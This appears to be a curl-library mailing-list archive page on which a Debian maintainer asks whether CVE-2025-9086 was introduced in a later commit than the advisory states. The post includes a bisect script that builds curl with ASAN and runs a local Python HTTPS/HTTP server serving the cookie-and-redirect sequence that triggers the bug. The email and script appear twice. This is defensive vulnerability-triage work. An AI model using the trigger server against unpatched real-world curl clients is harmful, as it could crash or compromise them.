Buy commercial curl support. We
help you work out your issues, debug your libcurl applications, use the API,
port to new platforms, add new features and more. With a team lead by the
curl founder Daniel himself.
CVE-2025-9086 introduced later than originally assessed?
- Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]
From: Samuel Henrique via curl-library <curl-library_at_lists.haxx.se>
Date: Sun, 4 Jan 2026 22:37:25 -0800
Hello curl friends,
I was investigating CVE-2025-9086 for Debian, trying to run the POC against our
older releases together with Alex and could not run it against 7.88.1, even
though it was supposedly introduced in 7.31.0 as per
https://curl.se/docs/CVE-2025-9086.html.
Running a git bisect on the upstream project [0], I've landed on the following
commit as introducing the ASAN failure:
https://github.com/curl/curl/commit/1aea05a6c2699e80c75936d58569851555acd603
I understand not triggering the ASAN finding doesn't necessarily means the
issue didn't exist, so I wanted to ask for upstream help here, do you believe
that could be the correct breaking commit, rather than
https://github.com/curl/curl/commit/f24dc09d209a2f91ca38d?
I'm cc'ing Alex, who backported the fix for Debian and who noticed the POC
didn't run for our older releases, and also Charles, who helped us release an
advisory for one of the older Debian releases (we might have released an
advisory which wasn't needed).
The bisect script I used is at the bottom of this email [0], but note that in
order to run it, you will need to map your hostname to 127.0.0.1 in /etc/hosts
if it's not already there.
Cheers,
[0]
```bash
#!/bin/bash
untestable() {
git_clean
exit 125
}
fail() {
git_clean
exit 1
}
git_clean() {
git reset --hard
git clean -d -x -f > /dev/null
set +x
}
set -x
autoreconf -i
export CFLAGS=-fsanitize=address -g -fno-omit-frame-pointer -O1
export LDFLAGS=-fsanitize=address
export LIBS=-lasan
./configure --with-nghttp2 \
--with-openssl \
--with-ca-path=/etc/ssl/certs \
--with-ca-bundle=/etc/ssl/certs/ca-certificates.crt \
--prefix $HOME/curl/install \
--includedir=/usr/include/x86_64-linux-gnu \
|| untestable
make -j || untestable
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 1 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNa
meOrHostname"
cat << EOF > server.py
#! /usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
import ssl
import threading
import time
class HTTPSRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header("Set-Cookie", "A=B; path=/; Secure")
self.send_header("Location", f"http://{socket.gethostname()}:9080")
self.end_headers()
class HTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Set-Cookie", "A=C; path=/foo/")
self.end_headers()
self.wfile.write(b"A" * 128)
def run_https_server():
httpd = HTTPServer(('', 9443), HTTPSRequestHandler)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(certfile='./cert.pem', keyfile="./key.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
def run_http_server():
httpd = HTTPServer(('', 9080), HTTPRequestHandler)
httpd.serve_forever()
if __name__ == "__main__":
https_thread = threading.Thread(target=run_https_server)
http_thread = threading.Thread(target=run_http_server)
https_thread.start()
http_thread.start()
while True:
time.sleep(1)
EOF
python3 server.py &
SERVER_PID=$!
sleep 1
export ASAN_OPTIONS=exitcode=42
./src/curl --insecure -c cookies -vv -L "https://${HOSTNAME}:9443"
CURL_EXIT_CODE="$?"
kill "$SERVER_PID"
echo "CURL EXIT CODE: $CURL_EXIT_CODE"
if [ "$CURL_EXIT_CODE" -eq 42 ]; then
fail
fi
# If we got here, success.
set +x
git reset --hard
exit 0
```
Date: Sun, 4 Jan 2026 22:37:25 -0800
Hello curl friends,
I was investigating CVE-2025-9086 for Debian, trying to run the POC against our
older releases together with Alex and could not run it against 7.88.1, even
though it was supposedly introduced in 7.31.0 as per
https://curl.se/docs/CVE-2025-9086.html.
Running a git bisect on the upstream project [0], I've landed on the following
commit as introducing the ASAN failure:
https://github.com/curl/curl/commit/1aea05a6c2699e80c75936d58569851555acd603
I understand not triggering the ASAN finding doesn't necessarily means the
issue didn't exist, so I wanted to ask for upstream help here, do you believe
that could be the correct breaking commit, rather than
https://github.com/curl/curl/commit/f24dc09d209a2f91ca38d?
I'm cc'ing Alex, who backported the fix for Debian and who noticed the POC
didn't run for our older releases, and also Charles, who helped us release an
advisory for one of the older Debian releases (we might have released an
advisory which wasn't needed).
The bisect script I used is at the bottom of this email [0], but note that in
order to run it, you will need to map your hostname to 127.0.0.1 in /etc/hosts
if it's not already there.
Cheers,
[0]
```bash
#!/bin/bash
untestable() {
git_clean
exit 125
}
fail() {
git_clean
exit 1
}
git_clean() {
git reset --hard
git clean -d -x -f > /dev/null
set +x
}
set -x
autoreconf -i
export CFLAGS=-fsanitize=address -g -fno-omit-frame-pointer -O1
export LDFLAGS=-fsanitize=address
export LIBS=-lasan
./configure --with-nghttp2 \
--with-openssl \
--with-ca-path=/etc/ssl/certs \
--with-ca-bundle=/etc/ssl/certs/ca-certificates.crt \
--prefix $HOME/curl/install \
--includedir=/usr/include/x86_64-linux-gnu \
|| untestable
make -j || untestable
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 1 -nodes -subj "/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNa
meOrHostname"
cat << EOF > server.py
#! /usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
import ssl
import threading
import time
class HTTPSRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header("Set-Cookie", "A=B; path=/; Secure")
self.send_header("Location", f"http://{socket.gethostname()}:9080")
self.end_headers()
class HTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Set-Cookie", "A=C; path=/foo/")
self.end_headers()
self.wfile.write(b"A" * 128)
def run_https_server():
httpd = HTTPServer(('', 9443), HTTPSRequestHandler)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(certfile='./cert.pem', keyfile="./key.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
def run_http_server():
httpd = HTTPServer(('', 9080), HTTPRequestHandler)
httpd.serve_forever()
if __name__ == "__main__":
https_thread = threading.Thread(target=run_https_server)
http_thread = threading.Thread(target=run_http_server)
https_thread.start()
http_thread.start()
while True:
time.sleep(1)
EOF
python3 server.py &
SERVER_PID=$!
sleep 1
export ASAN_OPTIONS=exitcode=42
./src/curl --insecure -c cookies -vv -L "https://${HOSTNAME}:9443"
CURL_EXIT_CODE="$?"
kill "$SERVER_PID"
echo "CURL EXIT CODE: $CURL_EXIT_CODE"
if [ "$CURL_EXIT_CODE" -eq 42 ]; then
fail
fi
# If we got here, success.
set +x
git reset --hard
exit 0
```
-- Samuel Henrique <samueloph> -- Unsubscribe: https://lists.haxx.se/mailman/listinfo/curl-library Etiquette: https://curl.se/mail/etiquette.htmlReceived on 2026-01-05